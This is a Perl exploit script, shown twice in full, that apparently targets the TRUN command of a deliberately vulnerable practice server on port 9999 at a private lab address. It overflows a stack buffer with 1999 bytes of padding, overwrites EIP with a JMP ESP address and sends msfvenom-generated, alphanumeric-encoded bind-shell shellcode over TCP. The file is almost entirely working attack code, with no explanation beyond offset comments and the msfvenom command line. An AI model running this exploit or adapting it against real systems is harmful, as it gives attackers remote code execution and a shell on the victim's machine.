0xbadjuju/trun.pl

## trun.pl
#!/usr/bin/perl

use strict;
use warnings;

use Encode qw/encode/;
use Socket;

my $target = inet_aton("192.168.99.144");
my $port = 9999;
my $portaddr = sockaddr_in($port, $target);

my $header = "TRUN /.:/";


my $padding1 = "A" x 1999;
#[*] Exact match at offset 1999
my $ebp = "BBBB";

#[*] Exact match at offset 2003
#625011AF   FFE4             JMP ESP
my $eip = "\xAF\x11\x50\x62";

#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -b "\x00" -f perl -e x86/alpha_mixed BufferRegister=ESP
my $payload =
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" .
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" .
"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x49\x78" .
"\x6d\x52\x65\x50\x75\x50\x45\x50\x45\x30\x6d\x59\x78\x65" .
"\x74\x71\x4b\x70\x30\x64\x4c\x4b\x62\x70\x74\x70\x6e\x6b" .
"\x76\x32\x34\x4c\x4e\x6b\x36\x32\x54\x54\x6c\x4b\x62\x52" .
"\x37\x58\x36\x6f\x4e\x57\x42\x6a\x54\x66\x35\x61\x69\x6f" .
"\x4e\x4c\x37\x4c\x53\x51\x43\x4c\x37\x72\x64\x6c\x55\x70" .
"\x4f\x31\x6a\x6f\x34\x4d\x46\x61\x4f\x37\x4d\x32\x49\x62" .
"\x36\x32\x70\x57\x4e\x6b\x62\x72\x32\x30\x4e\x6b\x63\x7a" .
"\x67\x4c\x6e\x6b\x62\x6c\x66\x71\x31\x68\x69\x73\x70\x48" .
"\x35\x51\x48\x51\x66\x31\x6e\x6b\x61\x49\x51\x30\x56\x61" .
"\x69\x43\x6e\x6b\x57\x39\x45\x48\x4d\x33\x76\x5a\x57\x39" .
"\x4e\x6b\x76\x54\x6e\x6b\x73\x31\x79\x46\x54\x71\x39\x6f" .
"\x6e\x4c\x4b\x71\x38\x4f\x46\x6d\x65\x51\x5a\x67\x34\x78" .
"\x6b\x50\x33\x45\x49\x66\x56\x63\x31\x6d\x5a\x58\x35\x6b" .
"\x53\x4d\x71\x34\x52\x55\x38\x64\x63\x68\x6c\x4b\x36\x38" .
"\x56\x44\x45\x51\x49\x43\x70\x66\x4c\x4b\x34\x4c\x52\x6b" .
"\x6c\x4b\x53\x68\x45\x4c\x76\x61\x49\x43\x4c\x4b\x55\x54" .
"\x4e\x6b\x76\x61\x78\x50\x4c\x49\x37\x34\x45\x74\x31\x34" .
"\x63\x6b\x33\x6b\x70\x61\x76\x39\x42\x7a\x53\x61\x69\x6f" .
"\x79\x70\x61\x4f\x71\x4f\x32\x7a\x6e\x6b\x62\x32\x48\x6b" .
"\x6c\x4d\x51\x4d\x50\x68\x67\x43\x77\x42\x77\x70\x33\x30" .
"\x33\x58\x63\x47\x44\x33\x37\x42\x51\x4f\x30\x54\x63\x58" .
"\x72\x6c\x51\x67\x35\x76\x53\x37\x6b\x4f\x48\x55\x6c\x78" .
"\x7a\x30\x77\x71\x47\x70\x43\x30\x71\x39\x4a\x64\x73\x64" .
"\x70\x50\x50\x68\x46\x49\x4d\x50\x70\x6b\x77\x70\x49\x6f" .
"\x48\x55\x61\x7a\x56\x68\x46\x39\x46\x30\x79\x72\x6b\x4d" .
"\x53\x70\x72\x70\x33\x70\x42\x70\x35\x38\x4b\x5a\x64\x4f" .
"\x4b\x6f\x39\x70\x49\x6f\x4e\x35\x6a\x37\x33\x58\x75\x52" .
"\x77\x70\x46\x71\x31\x4c\x4b\x39\x4a\x46\x51\x7a\x64\x50" .
"\x66\x36\x71\x47\x45\x38\x5a\x62\x6b\x6b\x64\x77\x35\x37" .
"\x39\x6f\x7a\x75\x72\x77\x55\x38\x4e\x57\x4d\x39\x56\x58" .
"\x4b\x4f\x4b\x4f\x79\x45\x43\x67\x62\x48\x61\x64\x68\x6c" .
"\x37\x4b\x38\x61\x6b\x4f\x58\x55\x43\x67\x6e\x77\x62\x48" .
"\x42\x55\x72\x4e\x62\x6d\x63\x51\x4b\x4f\x4e\x35\x55\x38" .
"\x72\x43\x42\x4d\x31\x74\x55\x50\x4c\x49\x79\x73\x51\x47" .
"\x31\x47\x72\x77\x35\x61\x4c\x36\x42\x4a\x46\x72\x72\x79" .
"\x56\x36\x79\x72\x49\x6d\x31\x76\x68\x47\x73\x74\x46\x44" .
"\x47\x4c\x65\x51\x33\x31\x6e\x6d\x73\x74\x74\x64\x44\x50" .
"\x48\x46\x63\x30\x43\x74\x73\x64\x52\x70\x42\x76\x63\x66" .
"\x76\x36\x61\x56\x61\x46\x52\x6e\x42\x76\x63\x66\x43\x63" .
"\x43\x66\x31\x78\x72\x59\x48\x4c\x57\x4f\x6e\x66\x49\x6f" .
"\x48\x55\x4f\x79\x49\x70\x72\x6e\x66\x36\x37\x36\x69\x6f" .
"\x64\x70\x75\x38\x65\x58\x6b\x37\x65\x4d\x31\x70\x69\x6f" .
"\x4a\x75\x4f\x4b\x5a\x50\x58\x35\x4c\x62\x61\x46\x43\x58" .
"\x6e\x46\x4d\x45\x4d\x6d\x4f\x6d\x69\x6f\x78\x55\x55\x6c" .
"\x43\x36\x33\x4c\x76\x6a\x6b\x30\x49\x6b\x49\x70\x54\x35" .
"\x37\x75\x4f\x4b\x73\x77\x72\x33\x34\x32\x30\x6f\x43\x5a" .
"\x55\x50\x30\x53\x6b\x4f\x6b\x65\x41\x41";

my $message = $header . $padding1 . $ebp . $eip . $payload;

print $message . "\r\n";

socket(SOCKET,PF_INET,SOCK_STREAM,getprotobyname('tcp'))
	or die "Can't create a socket $!\n";

connect(SOCKET , $portaddr)
   	or die "Unable to connect to socket $!\n";

send(SOCKET, $message, 0) == length($message)
	or die "cannot send to $target($port): $!";

close SOCKET or die "close: $!";
	#!/usr/bin/perl

	use strict;
	use warnings;

	use Encode qw/encode/;
	use Socket;

	my $target = inet_aton("192.168.99.144");
	my $port = 9999;
	my $portaddr = sockaddr_in($port, $target);

	my $header = "TRUN /.:/";


	my $padding1 = "A" x 1999;
	#[*] Exact match at offset 1999
	my $ebp = "BBBB";

	#[*] Exact match at offset 2003
	#625011AF FFE4 JMP ESP
	my $eip = "\xAF\x11\x50\x62";

	#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -b "\x00" -f perl -e x86/alpha_mixed BufferRegister=ESP
	my $payload =
	"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
	"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" .
	"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" .
	"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x49\x78" .
	"\x6d\x52\x65\x50\x75\x50\x45\x50\x45\x30\x6d\x59\x78\x65" .
	"\x74\x71\x4b\x70\x30\x64\x4c\x4b\x62\x70\x74\x70\x6e\x6b" .
	"\x76\x32\x34\x4c\x4e\x6b\x36\x32\x54\x54\x6c\x4b\x62\x52" .
	"\x37\x58\x36\x6f\x4e\x57\x42\x6a\x54\x66\x35\x61\x69\x6f" .
	"\x4e\x4c\x37\x4c\x53\x51\x43\x4c\x37\x72\x64\x6c\x55\x70" .
	"\x4f\x31\x6a\x6f\x34\x4d\x46\x61\x4f\x37\x4d\x32\x49\x62" .
	"\x36\x32\x70\x57\x4e\x6b\x62\x72\x32\x30\x4e\x6b\x63\x7a" .
	"\x67\x4c\x6e\x6b\x62\x6c\x66\x71\x31\x68\x69\x73\x70\x48" .
	"\x35\x51\x48\x51\x66\x31\x6e\x6b\x61\x49\x51\x30\x56\x61" .
	"\x69\x43\x6e\x6b\x57\x39\x45\x48\x4d\x33\x76\x5a\x57\x39" .
	"\x4e\x6b\x76\x54\x6e\x6b\x73\x31\x79\x46\x54\x71\x39\x6f" .
	"\x6e\x4c\x4b\x71\x38\x4f\x46\x6d\x65\x51\x5a\x67\x34\x78" .
	"\x6b\x50\x33\x45\x49\x66\x56\x63\x31\x6d\x5a\x58\x35\x6b" .
	"\x53\x4d\x71\x34\x52\x55\x38\x64\x63\x68\x6c\x4b\x36\x38" .
	"\x56\x44\x45\x51\x49\x43\x70\x66\x4c\x4b\x34\x4c\x52\x6b" .
	"\x6c\x4b\x53\x68\x45\x4c\x76\x61\x49\x43\x4c\x4b\x55\x54" .
	"\x4e\x6b\x76\x61\x78\x50\x4c\x49\x37\x34\x45\x74\x31\x34" .
	"\x63\x6b\x33\x6b\x70\x61\x76\x39\x42\x7a\x53\x61\x69\x6f" .
	"\x79\x70\x61\x4f\x71\x4f\x32\x7a\x6e\x6b\x62\x32\x48\x6b" .
	"\x6c\x4d\x51\x4d\x50\x68\x67\x43\x77\x42\x77\x70\x33\x30" .
	"\x33\x58\x63\x47\x44\x33\x37\x42\x51\x4f\x30\x54\x63\x58" .
	"\x72\x6c\x51\x67\x35\x76\x53\x37\x6b\x4f\x48\x55\x6c\x78" .
	"\x7a\x30\x77\x71\x47\x70\x43\x30\x71\x39\x4a\x64\x73\x64" .
	"\x70\x50\x50\x68\x46\x49\x4d\x50\x70\x6b\x77\x70\x49\x6f" .
	"\x48\x55\x61\x7a\x56\x68\x46\x39\x46\x30\x79\x72\x6b\x4d" .
	"\x53\x70\x72\x70\x33\x70\x42\x70\x35\x38\x4b\x5a\x64\x4f" .
	"\x4b\x6f\x39\x70\x49\x6f\x4e\x35\x6a\x37\x33\x58\x75\x52" .
	"\x77\x70\x46\x71\x31\x4c\x4b\x39\x4a\x46\x51\x7a\x64\x50" .
	"\x66\x36\x71\x47\x45\x38\x5a\x62\x6b\x6b\x64\x77\x35\x37" .
	"\x39\x6f\x7a\x75\x72\x77\x55\x38\x4e\x57\x4d\x39\x56\x58" .
	"\x4b\x4f\x4b\x4f\x79\x45\x43\x67\x62\x48\x61\x64\x68\x6c" .
	"\x37\x4b\x38\x61\x6b\x4f\x58\x55\x43\x67\x6e\x77\x62\x48" .
	"\x42\x55\x72\x4e\x62\x6d\x63\x51\x4b\x4f\x4e\x35\x55\x38" .
	"\x72\x43\x42\x4d\x31\x74\x55\x50\x4c\x49\x79\x73\x51\x47" .
	"\x31\x47\x72\x77\x35\x61\x4c\x36\x42\x4a\x46\x72\x72\x79" .
	"\x56\x36\x79\x72\x49\x6d\x31\x76\x68\x47\x73\x74\x46\x44" .
	"\x47\x4c\x65\x51\x33\x31\x6e\x6d\x73\x74\x74\x64\x44\x50" .
	"\x48\x46\x63\x30\x43\x74\x73\x64\x52\x70\x42\x76\x63\x66" .
	"\x76\x36\x61\x56\x61\x46\x52\x6e\x42\x76\x63\x66\x43\x63" .
	"\x43\x66\x31\x78\x72\x59\x48\x4c\x57\x4f\x6e\x66\x49\x6f" .
	"\x48\x55\x4f\x79\x49\x70\x72\x6e\x66\x36\x37\x36\x69\x6f" .
	"\x64\x70\x75\x38\x65\x58\x6b\x37\x65\x4d\x31\x70\x69\x6f" .
	"\x4a\x75\x4f\x4b\x5a\x50\x58\x35\x4c\x62\x61\x46\x43\x58" .
	"\x6e\x46\x4d\x45\x4d\x6d\x4f\x6d\x69\x6f\x78\x55\x55\x6c" .
	"\x43\x36\x33\x4c\x76\x6a\x6b\x30\x49\x6b\x49\x70\x54\x35" .
	"\x37\x75\x4f\x4b\x73\x77\x72\x33\x34\x32\x30\x6f\x43\x5a" .
	"\x55\x50\x30\x53\x6b\x4f\x6b\x65\x41\x41";

	my $message = $header . $padding1 . $ebp . $eip . $payload;

	print $message . "\r\n";

	socket(SOCKET,PF_INET,SOCK_STREAM,getprotobyname('tcp'))
	or die "Can't create a socket $!\n";

	connect(SOCKET , $portaddr)
	or die "Unable to connect to socket $!\n";

	send(SOCKET, $message, 0) == length($message)
	or die "cannot send to $target($port): $!";

	close SOCKET or die "close: $!";